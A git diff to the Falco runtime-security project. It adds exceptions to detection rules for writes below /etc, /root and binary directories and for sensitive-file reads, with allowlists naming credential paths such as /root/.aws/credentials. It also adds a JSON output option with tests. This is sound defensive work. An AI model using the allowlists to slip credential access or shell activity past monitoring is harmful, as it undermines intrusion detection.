+ and (fd.name startswith /etc/opt/omi or fd.name startswith /etc/opt/microsoft/omsagent)) -- macro: omsagent_writing_conf - condition: (proc.name in (omsagent,in_heartbeat_r*) and fd.name startswith /etc/opt/microsoft/omsagent) +- macro: ms_scx_writing_conf + condition: (proc.name in (GetLinuxOS.sh) and fd.name startswith /etc/opt/microsoft/scx) + +- macro: azure_scripts_writing_conf + condition: (proc.pname startswith "bash /var/lib/waagent/" and fd.name startswith /etc/azure) + +- macro: azure_networkwatcher_writing_conf 
+ condition: (proc.name in (NetworkWatcherA) and fd.name=/etc/init.d/AzureNetworkWatcherAgent) - macro: couchdb_writing_conf condition: (proc.name=beam.smp and proc.cmdline contains couchdb and fd.name startswith /etc/couchdb) @@ -497,10 +525,12 @@ condition: (proc.cmdline startswith "java LiveUpdate" and fd.name in (/etc/liveupdate.conf, /etc/Product.Catalog.JavaLiveUpdate)) - macro: sosreport_writing_files - condition: (proc.name=urlgrabber-ext- and proc.aname[3]=sosreport and fd.name startswith /etc/pkt/nssdb) + condition: > + (proc.name=urlgrabber-ext- and proc.aname[3]=sosreport and + (fd.name startswith /etc/pkt/nssdb or fd.name startswith /etc/pki/nssdb)) -- macro: semodule_writing_conf - condition: (proc.name=semodule and fd.name startswith /etc/selinux) +- macro: selinux_writing_conf + condition: (proc.name in (semodule,genhomedircon,sefcontext_comp) and fd.name startswith /etc/selinux) - list: veritas_binaries items: [vxconfigd, sfcache, vxclustadm, vxdctl, vxprint, vxdmpadm, vxdisk, vxdg, vxassist, vxtune] @@ -514,15 +544,47 @@ - macro: veritas_writing_config condition: (veritas_progs and fd.name startswith /etc/vx) +- macro: nginx_writing_conf + condition: (proc.name=nginx and fd.name startswith /etc/nginx) + +- macro: nginx_writing_certs + condition: > + (((proc.name=openssl and proc.pname=nginx-launch.sh) or proc.name=nginx-launch.sh) and fd.name startswith /etc/nginx/certs) + +- macro: chef_client_writing_conf + condition: (proc.pcmdline startswith "chef-client /opt/gitlab" and fd.name startswith /etc/gitlab) + +- macro: centrify_writing_krb + condition: (proc.name in (adjoin,addns) and fd.name startswith /etc/krb5) + +- macro: cockpit_writing_conf + condition: > + ((proc.pname=cockpit-kube-la or proc.aname[2]=cockpit-kube-la) + and fd.name startswith /etc/cockpit) + +- macro: ipsec_writing_conf + condition: (proc.name=start-ipsec.sh and fd.directory=/etc/ipsec) + - macro: exe_running_docker_save - condition: (container and proc.cmdline startswith 
"exe /var/lib/docker" and proc.pname in (dockerd, docker)) + condition: (proc.cmdline startswith "exe /var/lib/docker" and proc.pname in (dockerd, docker)) + +- macro: python_running_get_pip + condition: (proc.cmdline startswith "python get-pip.py") + +- macro: python_running_ms_oms + condition: (proc.cmdline startswith "python /var/lib/waagent/") - macro: gugent_writing_guestagent_log condition: (proc.name=gugent and fd.name=GuestAgent.log) - rule: Write below binary dir desc: an attempt to write to any file below a set of binary directories - condition: bin_dir and evt.dir = < and open_write and not package_mgmt_procs and not exe_running_docker_save + condition: > + bin_dir and evt.dir = < and open_write + and not package_mgmt_procs + and not exe_running_docker_save + and not python_running_get_pip + and not python_running_ms_oms output: > File below a known binary directory opened for writing (user=%user.name command=%proc.cmdline file=%fd.name parent=%proc.pname pcmdline=%proc.pcmdline gparent=%proc.aname[2]) @@ -573,8 +635,8 @@ condition: (proc.name=curl and fd.directory=/etc/pki/nssdb) - macro: haproxy_writing_conf - condition: ((proc.name in (update-haproxy-,haproxy_reload.) or proc.pname=update-haproxy-) - and fd.name=/etc/openvpn/client.map or fd.directory=/etc/haproxy) + condition: ((proc.name in (update-haproxy-,haproxy_reload.) 
or proc.pname in (update-haproxy-,haproxy_reload,haproxy_reload.)) + and (fd.name=/etc/openvpn/client.map or fd.name startswith /etc/haproxy)) - macro: java_writing_conf condition: (proc.name=java and fd.name=/etc/.java/.systemPrefs/.system.lock) @@ -593,7 +655,7 @@ condition: ((proc.name=start-mysql.sh or proc.pname=start-mysql.sh) and fd.name startswith /etc/mysql) - macro: openvpn_writing_conf - condition: (proc.name=openvpn and fd.directory=/etc/openvpn) + condition: (proc.name in (openvpn,openvpn-entrypo) and fd.name startswith /etc/openvpn) - macro: php_handlers_writing_conf condition: (proc.name=php_handlers_co and fd.name=/etc/psa/php_versions.json) @@ -642,8 +704,8 @@ gen_resolvconf., update-ca-certi, certbot, runsv, qualys-cloud-ag, locales.postins, nomachine_binaries, adclient, certutil, crlutil, pam-auth-update, parallels_insta, - openshift-launc) - and not proc.pname in (sysdigcloud_binaries, mail_config_binaries, hddtemp.postins, sshkit_script_binaries, locales.postins, deb_binaries) + openshift-launc, update-rc.d) + and not proc.pname in (sysdigcloud_binaries, mail_config_binaries, hddtemp.postins, sshkit_script_binaries, locales.postins, deb_binaries, dhcp_binaries) and not fd.name pmatch (safe_etc_dirs) and not fd.name in (/etc/container_environment.sh, /etc/container_environment.json, /etc/motd, /etc/motd.svc) and not exe_running_docker_save @@ -685,30 +747,39 @@ and not openvpn_writing_conf and not consul_template_writing_conf and not countly_writing_nginx_conf - and not omiagent_writing_conf - and not omsagent_writing_conf + and not ms_oms_writing_conf + and not ms_scx_writing_conf + and not azure_scripts_writing_conf + and not azure_networkwatcher_writing_conf and not couchdb_writing_conf and not update_texmf_writing_conf and not slapadd_writing_conf and not symantec_writing_conf and not liveupdate_writing_conf and not sosreport_writing_files - and not semodule_writing_conf + and not selinux_writing_conf and not veritas_writing_config + and not 
nginx_writing_conf + and not nginx_writing_certs + and not chef_client_writing_conf + and not centrify_writing_krb + and not cockpit_writing_conf + and not ipsec_writing_conf - rule: Write below etc desc: an attempt to write to any file below /etc condition: write_etc_common - output: "File below /etc opened for writing (user=%user.name command=%proc.cmdline parent=%proc.pname pcmdline=%proc.pcmdline file=%fd.name name=%proc.name gparent=%proc.aname[2] ggparent=%proc.aname[3] gggparent=%proc.aname[4])" + output: "File below /etc opened for writing (user=%user.name command=%proc.cmdline parent=%proc.pname pcmdline=%proc.pcmdline file=%fd.name program=%proc.name gparent=%proc.aname[2] ggparent=%proc.aname[3] gggparent=%proc.aname[4])" priority: ERROR tags: [filesystem] - list: known_root_files items: [/root/.monit.state, /root/.auth_tokens, /root/.bash_history, /root/.ash_history, /root/.aws/credentials, - /root/.viminfo.tmp, /root/.lesshst, /root/.bzr.log, /root/.gitconfig.lock, /root/.babel.json, /root/.localstack] + /root/.viminfo.tmp, /root/.lesshst, /root/.bzr.log, /root/.gitconfig.lock, /root/.babel.json, /root/.localstack, + /root/.node_repl_history, /root/.mongorc.js, /root/.dbshell, /root/.augeas/history, /root/.rnd] - list: known_root_directories - items: [/root/.oracle_jre_usage, /root/.ssh] + items: [/root/.oracle_jre_usage, /root/.ssh, /root/.subversion, /root/.nami] - macro: known_root_conditions condition: (fd.name startswith /root/orcexec. 
@@ -733,6 +804,13 @@ or fd.name startswith /root/.gnupg or fd.name startswith /root/.pgpass or fd.name startswith /root/.theano + or fd.name startswith /root/.gradle + or fd.name startswith /root/.android + or fd.name startswith /root/.ansible + or fd.name startswith /root/.crashlytics + or fd.name startswith /root/.dbus + or fd.name startswith /root/.composer + or fd.name startswith /root/.gconf or fd.name startswith /root/.nv) - rule: Write below root @@ -744,7 +822,7 @@ and not exe_running_docker_save and not gugent_writing_guestagent_log and not known_root_conditions - output: "File below / or /root opened for writing (user=%user.name command=%proc.cmdline parent=%proc.pname file=%fd.name name=%proc.name)" + output: "File below / or /root opened for writing (user=%user.name command=%proc.cmdline parent=%proc.pname file=%fd.name program=%proc.name)" priority: ERROR tags: [filesystem] @@ -768,7 +846,7 @@ iptables, ps, lsb_release, check-new-relea, dumpe2fs, accounts-daemon, sshd, vsftpd, systemd, mysql_install_d, psql, screen, debconf-show, sa-update, pam-auth-update, /usr/sbin/spamd, polkit-agent-he, lsattr, file, sosreport, - scxcimservera + scxcimservera, adclient, rtvscand, cockpit-session ] # Add conditions to this macro (probably in a separate file, @@ -804,8 +882,9 @@ and not perl_running_plesk and not perl_running_updmap and not veritas_driver_script + and not perl_running_centrifydc output: > - Sensitive file opened for reading by non-trusted program (user=%user.name name=%proc.name + Sensitive file opened for reading by non-trusted program (user=%user.name program=%proc.name command=%proc.cmdline file=%fd.name parent=%proc.pname gparent=%proc.aname[2] ggparent=%proc.aname[3] gggparent=%proc.aname[4]) priority: WARNING tags: [filesystem] @@ -847,7 +926,7 @@ - rule: Modify binary dirs desc: an attempt to modify any file below a set of binary directories. 
- condition: bin_dir_rename and modify and not package_mgmt_procs + condition: bin_dir_rename and modify and not package_mgmt_procs and not exe_running_docker_save output: > File below known binary directory renamed/removed (user=%user.name command=%proc.cmdline operation=%evt.type file=%fd.name %evt.args) @@ -976,6 +1055,9 @@ or parent_java_running_datastax or possibly_node_in_container) +- list: mesos_shell_binaries + items: [mesos-docker-ex, mesos-slave, mesos-health-ch] + # Note that runsv is both in protected_shell_spawner and the # exclusions by pname. This means that runsv can itself spawn shells # (the ./run and ./finish scripts), but the processes runsv can not @@ -989,6 +1071,7 @@ and protected_shell_spawner and not proc.pname in (shell_binaries, gitlab_binaries, cron_binaries, user_known_shell_spawn_binaries, needrestart_binaries, + mesos_shell_binaries, erl_child_setup, exechealthz, PM2, PassengerWatchd, c_rehash, svlogd, logrotate, hhvm, serf, lb-controller, nvidia-installe, runsv, statsite, erlexec) @@ -1029,7 +1112,14 @@ container.image startswith rook/toolbox or container.image startswith registry.access.redhat.com/openshift3/logging-fluentd or container.image startswith registry.access.redhat.com/openshift3/logging-elasticsearch or - container.image startswith cloudnativelabs/kube-router) + container.image startswith registry.access.redhat.com/openshift3/metrics-cassandra or + container.image startswith openshift3/ose-sti-builder or + container.image startswith registry.access.redhat.com/openshift3/ose-sti-builder or + container.image startswith cloudnativelabs/kube-router or + container.image startswith "consul:" or + container.image startswith mesosphere/mesos-slave or + container.image startswith istio/proxy_ or + container.image startswith datadog/docker-dd-agent) # Add conditions to this macro (probably in a separate file, # overwriting this macro) to specify additional containers that are @@ -1179,7 +1269,9 @@ '"sh -c /bin/hostname -f 2> 
/dev/null"', '"sh -c locale -a"', '"sh -c -t -i"', - '"sh -c openssl version"' + '"sh -c openssl version"', + '"bash -c id -Gn kafadmin"', + '"sh -c /bin/sh -c ''date +%%s''"' ] # This list allows for easy additions to the set of commands allowed @@ -1272,13 +1364,15 @@ condition: > spawned_process and proc.name in (user_mgmt_binaries) and not proc.name in (su, sudo, lastlog, nologin, unix_chkpwd) and not container and - not proc.pname in (cron_binaries, systemd, run-parts) and + not proc.pname in (cron_binaries, systemd, systemd.postins, udev.postinst, run-parts) and not proc.cmdline startswith "passwd -S" and not proc.cmdline startswith "useradd -D" and not proc.cmdline startswith "systemd --version" and not run_by_qualys and not run_by_sumologic_securefiles and - not run_by_yum + not run_by_yum and + not run_by_ms_oms and + not run_by_google_accounts_daemon output: > User management binary command run outside of container (user=%user.name command=%proc.cmdline parent=%proc.pname gparent=%proc.aname[2] ggparent=%proc.aname[3] gggparent=%proc.aname[4]) diff --git a/test/falco_test.py b/test/falco_test.py index 79b218e8..19956591 100644 --- a/test/falco_test.py +++ b/test/falco_test.py @@ -30,6 +30,7 @@ class FalcoTest(Test): self.trace_file = os.path.join(self.basedir, self.trace_file) self.json_output = self.params.get('json_output', '*', default=False) + self.json_include_output_property = self.params.get('json_include_output_property', '*', default=True) self.priority = self.params.get('priority', '*', default='debug') self.rules_file = self.params.get('rules_file', '*', default=os.path.join(self.basedir, '../rules/falco_rules.yaml')) @@ -249,7 +250,11 @@ class FalcoTest(Test): for line in res.stdout.splitlines(): if line.startswith('{'): obj = json.loads(line) - for attr in ['time', 'rule', 'priority', 'output']: + if self.json_include_output_property: + attrs = ['time', 'rule', 'priority', 'output'] + else: + attrs = ['time', 'rule', 'priority'] + for attr in 
attrs: if not attr in obj: self.fail("Falco JSON object {} does not contain property \"{}\"".format(line, attr)) @@ -348,8 +353,8 @@ class FalcoTest(Test): trace_arg = "-e {}".format(self.trace_file) # Run falco - cmd = '{} {} {} -c {} {} -o json_output={} -o priority={} -v'.format( - self.falco_binary_path, self.rules_args, self.disabled_args, self.conf_file, trace_arg, self.json_output, self.priority) + cmd = '{} {} {} -c {} {} -o json_output={} -o json_include_output_property={} -o priority={} -v'.format( + self.falco_binary_path, self.rules_args, self.disabled_args, self.conf_file, trace_arg, self.json_output, self.json_include_output_property, self.priority) for tag in self.disable_tags: cmd += ' -T {}'.format(tag) diff --git a/test/falco_tests.yaml b/test/falco_tests.yaml index f176a9b9..5c46d606 100644 --- a/test/falco_tests.yaml +++ b/test/falco_tests.yaml @@ -655,3 +655,19 @@ trace_files: !mux - rules/rule_append_false.yaml trace_file: trace_files/cat_write.scap + json_output_no_output_property: + json_output: True + json_include_output_property: False + detect: True + detect_level: WARNING + rules_file: + - rules/rule_append.yaml + trace_file: trace_files/cat_write.scap + stdout_contains: "^(?!.*Warning An open of /dev/null was seen.*)" + + in_operator_netmasks: + detect: True + detect_level: INFO + rules_file: + - rules/detect_connect_using_in.yaml + trace_file: trace_files/connect_localhost.scap \ No newline at end of file diff --git a/test/rules/detect_connect_using_in.yaml b/test/rules/detect_connect_using_in.yaml new file mode 100644 index 00000000..bd87a56f --- /dev/null +++ b/test/rules/detect_connect_using_in.yaml @@ -0,0 +1,6 @@ +- rule: Localhost connect + desc: Detect any connect to the localhost network, using fd.net and the in operator + condition: evt.type=connect and fd.net in ("127.0.0.1/24") + output: Program connected to localhost network + (user=%user.name command=%proc.cmdline connection=%fd.name) + priority: INFO diff --git 
a/test/trace_files/connect_localhost.scap b/test/trace_files/connect_localhost.scap new file mode 100644 index 00000000..8806a67a Binary files /dev/null and b/test/trace_files/connect_localhost.scap differ diff --git a/userspace/engine/falco_engine.cpp b/userspace/engine/falco_engine.cpp index 4203515e..4c61e7b4 100644 --- a/userspace/engine/falco_engine.cpp +++ b/userspace/engine/falco_engine.cpp @@ -88,7 +88,8 @@ void falco_engine::load_rules(const string &rules_content, bool verbose, bool al // formats.formatter is used, so we can unconditionally set // json_output to false. bool json_output = false; - falco_formats::init(m_inspector, m_ls, json_output); + bool json_include_output_property = false; + falco_formats::init(m_inspector, m_ls, json_output, json_include_output_property); m_rules->load_rules(rules_content, verbose, all_events, m_extra, m_replace_container_info, m_min_priority); } diff --git a/userspace/engine/formats.cpp b/userspace/engine/formats.cpp index d5e0d386..946db332 100644 --- a/userspace/engine/formats.cpp +++ b/userspace/engine/formats.cpp @@ -25,6 +25,7 @@ along with falco. If not, see . 
sinsp* falco_formats::s_inspector = NULL; bool falco_formats::s_json_output = false; +bool falco_formats::s_json_include_output_property = true; sinsp_evt_formatter_cache *falco_formats::s_formatters = NULL; const static struct luaL_reg ll_falco [] = @@ -36,10 +37,11 @@ const static struct luaL_reg ll_falco [] = {NULL,NULL} }; -void falco_formats::init(sinsp* inspector, lua_State *ls, bool json_output) +void falco_formats::init(sinsp* inspector, lua_State *ls, bool json_output, bool json_include_output_property) { s_inspector = inspector; s_json_output = json_output; + s_json_include_output_property = json_include_output_property; if(!s_formatters) { s_formatters = new sinsp_evt_formatter_cache(s_inspector); @@ -155,8 +157,12 @@ int falco_formats::format_event (lua_State *ls) event["time"] = iso8601evttime; event["rule"] = rule; event["priority"] = level; - // This is the filled-in output line. - event["output"] = line; + + if(s_json_include_output_property) + { + // This is the filled-in output line. 
+ event["output"] = line; + } full_line = writer.write(event); diff --git a/userspace/engine/formats.h b/userspace/engine/formats.h index c901460b..dcace918 100644 --- a/userspace/engine/formats.h +++ b/userspace/engine/formats.h @@ -31,7 +31,7 @@ class sinsp_evt_formatter; class falco_formats { public: - static void init(sinsp* inspector, lua_State *ls, bool json_output); + static void init(sinsp* inspector, lua_State *ls, bool json_output, bool json_include_output_property); // formatter = falco.formatter(format_string) static int formatter(lua_State *ls); @@ -48,4 +48,5 @@ class falco_formats static sinsp* s_inspector; static sinsp_evt_formatter_cache *s_formatters; static bool s_json_output; + static bool s_json_include_output_property; }; diff --git a/userspace/falco/configuration.cpp b/userspace/falco/configuration.cpp index 4df8fe79..a3a9098f 100644 --- a/userspace/falco/configuration.cpp +++ b/userspace/falco/configuration.cpp @@ -67,6 +67,7 @@ void falco_configuration::init(string conf_filename, list &cmdline_optio } m_json_output = m_config->get_scalar("json_output", false); + m_json_include_output_property = m_config->get_scalar("json_include_output_property", true); falco_outputs::output_config file_output; file_output.name = "file"; diff --git a/userspace/falco/configuration.h b/userspace/falco/configuration.h index a6ba8fdb..40d54f79 100644 --- a/userspace/falco/configuration.h +++ b/userspace/falco/configuration.h @@ -167,6 +167,7 @@ class falco_configuration std::list m_rules_filenames; bool m_json_output; + bool m_json_include_output_property; std::vector m_outputs; uint32_t m_notifications_rate; uint32_t m_notifications_max_burst; diff --git a/userspace/falco/falco.cpp b/userspace/falco/falco.cpp index 6943a927..aa2253b6 100644 --- a/userspace/falco/falco.cpp +++ b/userspace/falco/falco.cpp @@ -547,6 +547,7 @@ int falco_init(int argc, char **argv) } outputs->init(config.m_json_output, + config.m_json_include_output_property, 
config.m_notifications_rate, config.m_notifications_max_burst, config.m_buffered_outputs); diff --git a/userspace/falco/falco_outputs.cpp b/userspace/falco/falco_outputs.cpp index 473a8c27..ed07bff2 100644 --- a/userspace/falco/falco_outputs.cpp +++ b/userspace/falco/falco_outputs.cpp @@ -52,7 +52,9 @@ falco_outputs::~falco_outputs() } } -void falco_outputs::init(bool json_output, uint32_t rate, uint32_t max_burst, bool buffered) +void falco_outputs::init(bool json_output, + bool json_include_output_property, + uint32_t rate, uint32_t max_burst, bool buffered) { // The engine must have been given an inspector by now. if(! m_inspector) @@ -65,7 +67,7 @@ void falco_outputs::init(bool json_output, uint32_t rate, uint32_t max_burst, bo // Note that falco_formats is added to both the lua state used // by the falco engine as well as the separate lua state used // by falco outputs. - falco_formats::init(m_inspector, m_ls, json_output); + falco_formats::init(m_inspector, m_ls, json_output, json_include_output_property); falco_logger::init(m_ls); diff --git a/userspace/falco/falco_outputs.h b/userspace/falco/falco_outputs.h index 236a8caf..9a45d599 100644 --- a/userspace/falco/falco_outputs.h +++ b/userspace/falco/falco_outputs.h @@ -41,7 +41,9 @@ public: std::map options; }; - void init(bool json_output, uint32_t rate, uint32_t max_burst, bool buffered); + void init(bool json_output, + bool json_include_output_property, + uint32_t rate, uint32_t max_burst, bool buffered); void add_output(output_config oc);